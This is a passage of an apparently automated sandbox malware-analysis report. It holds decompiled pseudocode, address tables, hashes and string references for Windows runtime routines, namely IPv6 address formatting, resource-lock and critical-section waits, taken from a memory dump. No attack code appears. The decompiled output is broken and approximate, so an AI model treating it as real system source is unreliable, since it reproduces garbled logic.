                    0x0211236a
                    0x0211236c
                    0x02112371
                    0x02112373
                    0x00000000
                    0x02112379
                    0x02112379
                    0x0211237a
                    0x0211237f
                    0x0211237f
                    0x02112385
                    0x02112386
                    0x02112389
                    0x0211238e
                    0x02112390
                    0x020d5378
                    0x020d537c
                    0x02112396
                    0x02112396
                    0x02112397
                    0x0211239c
                    0x021123a2
                    0x021123a3
                    0x021123a6
                    0x021123ab
                    0x021123ad
                    0x00000000
                    0x021123b3
                    0x021123b3
                    0x021123b4
                    0x021123b9
                    0x021123ba
                    0x021123ba
                    0x021123bc
                    0x021123bf
                    0x00000000
                    0x00000000
                    0x02109153
                    0x02109158
                    0x0210915a
                    0x0210915e
                    0x02109160
                    0x00000000
                    0x02109166
                    0x02109166
                    0x02109171
                    0x02109176
                    0x02109176
                    0x00000000
                    0x02109160
                    0x021123c6
                    0x021123ce
                    0x021123d7
                    0x021123d7
                    0x021123ad
                    0x02112390
                    0x02112373
                    0x0211233f
                    0x0211233f
                    0x00000000
                    0x0211233f
                    0x02112291
                    0x02112291
                    0x02112293
                    0x02112295
                    0x0211229a
                    0x021122a1
                    0x021122a3
                    0x021122a7
                    0x021122a9
                    0x00000000
                    0x00000000
                    0x021122ab
                    0x021122ad
                    0x021122af
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021122af
                    0x021122b1
                    0x021122b4
                    0x021122b4
                    0x021122b6
                    0x020d53be
                    0x020d53be
                    0x020d53be
                    0x020d53c0
                    0x00000000
                    0x00000000
                    0x020d53cb
                    0x020d53ce
                    0x020d53d0
                    0x020d53d4
                    0x020d53d6
                    0x00000000
                    0x020d53d8
                    0x020d53e3
                    0x020d53ea
                    0x020d53ea
                    0x00000000
                    0x020d53d6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021122b6
                    0x00000000
                    0x0211228f
                    0x02112349
                    0x0211234d
                    0x02112251
                    0x02112251
                    0x00000000
                    0x02112251
                    0x021121a4
                    0x021121a4
                    0x021121a6
                    0x021121a8
                    0x021121ac
                    0x021121b6
                    0x021121b8
                    0x021121bc
                    0x021121be
                    0x00000000
                    0x00000000
                    0x021121c0
                    0x021121c2
                    0x021121c4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021121c4
                    0x021121c6
                    0x021121c6
                    0x021121c8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021121c8
                    0x021121a2
                    0x00000000
                    0x02112183
                    0x020f057b
                    0x020f057d
                    0x020f0581
                    0x020f0583
                    0x02112178
                    0x00000000
                    0x020f0589
                    0x020f058f
                    0x020f058f
                    0x020f0583
                    0x00000000

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02112206
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-4236105082
                    • Opcode ID: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                    • Instruction ID: be7253778e1d9328c9c9b6a3b8262088db2d6b753e4f4cb0bcefcc8555bf9e65
                    • Opcode Fuzzy Hash: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                    • Instruction Fuzzy Hash: E15109717803216FEB25CA18CCC1FA673AAAF88724F214269ED55DF285DB71EC418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020F14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E020F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2192088; // 0x777117bf
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E020E7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E020F13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E020B2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E020BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                    0x020f14c0
                    0x020f14cb
                    0x020f14d2
                    0x020f14d6
                    0x020f14da
                    0x020f14de
                    0x020f14e3
                    0x020f157a
                    0x020f157a
                    0x020f14f1
                    0x020f14f3
                    0x0211ea0f
                    0x00000000
                    0x0211ea15
                    0x00000000
                    0x0211ea15
                    0x020f14f9
                    0x020f14f9
                    0x020f14fe
                    0x020f1504
                    0x0211ea1a
                    0x0211ea1f
                    0x0211ea21
                    0x0211ea22
                    0x0211ea27
                    0x0211ea2a
                    0x0211ea2a
                    0x020f1515
                    0x020f1517
                    0x020f156d
                    0x020f1572
                    0x020f1575
                    0x020f1575
                    0x020f151e
                    0x0211ea50
                    0x0211ea55
                    0x0211ea58
                    0x0211ea58
                    0x020f152e
                    0x020f1531
                    0x020f1533
                    0x00000000
                    0x020f1535
                    0x020f1541
                    0x020f1549
                    0x020f1549
                    0x020f1533
                    0x020f14f3
                    0x020f1559

                    APIs
                    • ___swprintf_l.LIBCMT ref: 0211EA22
                      • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F146B
                      • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F1490
                    • ___swprintf_l.LIBCMT ref: 020F156D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: %%%u$]:%u
                    • API String ID: 48624451-3050659472
                    • Opcode ID: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                    • Instruction ID: 540c9c4d2d3de464a6b1d186d4dd877d2f46c0818e5861d44fd8c801678c6718
                    • Opcode Fuzzy Hash: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                    • Instruction Fuzzy Hash: 0E21C372940319EBDF61DE94CC41AEEB3ADAF10B04F444425EE4AE3140DB70AA589BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020D53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                    Download Yara Rule
                    C-Code - Quality: 45%
                    			E020D53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021901c0;
									_push(_t92);
									_push(0);
									_t37 = E020AF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E020F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0213217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02103F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E020F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E020D5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E020AF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E020F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E020F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E020F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E020D5329(_t74, _t92);
													_push(1);
													_t48 = E020D53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                    0x020d53ab
                    0x020d53ae
                    0x020d53b1
                    0x020d53b4
                    0x020d53b7
                    0x020f05b6
                    0x020f05c0
                    0x020f05c3
                    0x00000000
                    0x020f05c9
                    0x020f05c9
                    0x020f05cc
                    0x020f05d5
                    0x020f05d5
                    0x020d53bd
                    0x020d53bd
                    0x020d53bd
                    0x020d53be
                    0x020d53be
                    0x020d53be
                    0x020d53c0
                    0x00000000
                    0x00000000
                    0x02112269
                    0x0211226d
                    0x02112349
                    0x0211234d
                    0x02112273
                    0x02112276
                    0x02112279
                    0x0211227e
                    0x02112283
                    0x02112287
                    0x0211228a
                    0x0211228d
                    0x0211228f
                    0x021122bc
                    0x021122bc
                    0x021122bc
                    0x021122be
                    0x021122c4
                    0x021122cc
                    0x021122d0
                    0x021122d6
                    0x021122d7
                    0x021122da
                    0x021122df
                    0x021122e4
                    0x00000000
                    0x00000000
                    0x021122e6
                    0x021122e9
                    0x021122f4
                    0x021122f9
                    0x021122fa
                    0x02112305
                    0x02112314
                    0x02112319
                    0x0211231a
                    0x0211231d
                    0x02112320
                    0x02112323
                    0x02112323
                    0x02112328
                    0x0211232d
                    0x0211232f
                    0x02112331
                    0x02112336
                    0x02112336
                    0x0211233b
                    0x0211233d
                    0x02112350
                    0x02112351
                    0x02112356
                    0x02112359
                    0x02112359
                    0x0211235b
                    0x0211235d
                    0x020d5367
                    0x020d536b
                    0x020d5372
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x02112363
                    0x02112363
                    0x02112369
                    0x0211236a
                    0x0211236c
                    0x02112371
                    0x02112373
                    0x00000000
                    0x02112379
                    0x02112379
                    0x0211237a
                    0x0211237f
                    0x0211237f
                    0x02112385
                    0x02112386
                    0x02112389
                    0x0211238e
                    0x02112390
                    0x020d5378
                    0x020d537c
                    0x02112396
                    0x02112396
                    0x02112397
                    0x0211239c
                    0x021123a2
                    0x021123a3
                    0x021123a6
                    0x021123ab
                    0x021123ad
                    0x00000000
                    0x021123b3
                    0x021123b3
                    0x021123b4
                    0x021123b9
                    0x021123ba
                    0x021123ba
                    0x021123bc
                    0x021123bf
                    0x00000000
                    0x00000000
                    0x02109153
                    0x02109158
                    0x0210915a
                    0x0210915e
                    0x02109160
                    0x00000000
                    0x02109166
                    0x02109166
                    0x02109171
                    0x02109176
                    0x02109176
                    0x00000000
                    0x02109160
                    0x021123c6
                    0x021123cb
                    0x021123ce
                    0x021123d7
                    0x021123d7
                    0x021123ad
                    0x02112390
                    0x02112373
                    0x0211233f
                    0x0211233f
                    0x00000000
                    0x0211233f
                    0x02112291
                    0x02112291
                    0x02112293
                    0x02112295
                    0x0211229a
                    0x021122a1
                    0x021122a3
                    0x021122a7
                    0x021122a9
                    0x00000000
                    0x00000000
                    0x021122ab
                    0x021122ad
                    0x021122af
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021122af
                    0x021122b1
                    0x021122b4
                    0x021122b4
                    0x021122b6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021122b6
                    0x0211228f
                    0x00000000
                    0x0211226d
                    0x020d53cb
                    0x020d53ce
                    0x020d53d0
                    0x020d53d4
                    0x020d53d6
                    0x00000000
                    0x020d53d8
                    0x020d53e3
                    0x020d53ea
                    0x020d53ea
                    0x020d53d6
                    0x00000000

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021122F4
                    Strings
                    • RTL: Re-Waiting, xrefs: 02112328
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021122FC
                    • RTL: Resource at %p, xrefs: 0211230B
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-871070163
                    • Opcode ID: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                    • Instruction ID: e5d503eeaff2d5d2c48a5febbbce7a3080bdf8ba6336ffb9e1787967dded85a5
                    • Opcode Fuzzy Hash: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                    • Instruction Fuzzy Hash: 235108716417126BEB15DB28CCC0FE77799EF48324F104229FD15DB680EB71E8419BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020DEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                    Download Yara Rule
                    C-Code - Quality: 51%
                    			E020DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E020CDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x219793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E020B16C0(_t39);
				} else {
					_t40 = E020AF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E020F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E020B01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x219793c; // 0x0
								_push(_t85);
								_t44 = E020B1F28(_t71);
							} else {
								_t44 = E020AF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E020F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02132306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E020DEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E020F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02103F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02103F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x21920c0;
								if(_t85 != 0x21920c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0213217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02103F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                    0x020dec56
                    0x020dec56
                    0x020dec56
                    0x020dec5c
                    0x020dec64
                    0x021123e6
                    0x021123eb
                    0x021123eb
                    0x020dec6a
                    0x020dec6c
                    0x020dec6f
                    0x021123f3
                    0x021123f8
                    0x021123fa
                    0x021123fc
                    0x020dec75
                    0x020dec76
                    0x020dec76
                    0x020dec7b
                    0x020dec7c
                    0x020dec7e
                    0x02112406
                    0x02112407
                    0x0211240c
                    0x0211240d
                    0x0211240d
                    0x0211240d
                    0x02112414
                    0x02112417
                    0x0211241e
                    0x02112435
                    0x02112438
                    0x0211243c
                    0x0211243f
                    0x02112442
                    0x02112443
                    0x02112446
                    0x02112449
                    0x02112453
                    0x02112455
                    0x0211245b
                    0x0211245b
                    0x020deb99
                    0x020deb99
                    0x020deb9c
                    0x020deb9d
                    0x020deb9f
                    0x020deba2
                    0x02112465
                    0x0211246b
                    0x0211246d
                    0x020deba8
                    0x020deba9
                    0x020deba9
                    0x020debae
                    0x020debb3
                    0x020debb9
                    0x020debbb
                    0x02112513
                    0x02112514
                    0x02112519
                    0x0211251b
                    0x020dec2a
                    0x020dec2d
                    0x020dec33
                    0x020dec36
                    0x020dec3a
                    0x020dec3e
                    0x020dec40
                    0x020dec47
                    0x020dec47
                    0x020dec40
                    0x020b22c6
                    0x020debc1
                    0x020debc1
                    0x020debc5
                    0x020dec9a
                    0x020dec9a
                    0x020debd6
                    0x020debd6
                    0x00000000
                    0x020debbb
                    0x02112477
                    0x0211247c
                    0x02112486
                    0x0211248b
                    0x02112496
                    0x0211249b
                    0x0211249d
                    0x021124a0
                    0x021124a3
                    0x021124aa
                    0x021124aa
                    0x021124a5
                    0x021124a5
                    0x021124a5
                    0x021124ac
                    0x021124af
                    0x021124b0
                    0x021124b3
                    0x021124b9
                    0x021124ba
                    0x021124bb
                    0x021124c6
                    0x021124cb
                    0x021124cd
                    0x021124d0
                    0x021124d1
                    0x021124d4
                    0x021124d6
                    0x021124d9
                    0x021124d9
                    0x021124dc
                    0x021124df
                    0x021124e1
                    0x021124e7
                    0x021124e9
                    0x021124ec
                    0x021124ef
                    0x021124f2
                    0x021124f2
                    0x021124ef
                    0x021124e7
                    0x021124fa
                    0x021124ff
                    0x02112501
                    0x02112503
                    0x02112506
                    0x0211250b
                    0x020deb8c
                    0x020deb93
                    0x00000000
                    0x00000000
                    0x020deb93
                    0x00000000
                    0x020deb99
                    0x020dec85
                    0x020dec85
                    0x020dec85
                    0x00000000

                    Strings
                    • RTL: Re-Waiting, xrefs: 021124FA
                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021124BD
                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0211248D
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                    • API String ID: 0-3177188983
                    • Opcode ID: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                    • Instruction ID: cc5c3fb0341172c0ad6620dfacc2f767621e59453ecf592d90c3eb90ae6dec62
                    • Opcode Fuzzy Hash: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                    • Instruction Fuzzy Hash: 9941D570640314AFD724DB68CC89FAB77BAEF44320F208A15FA699B6C1D734E941DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020EFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E020EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
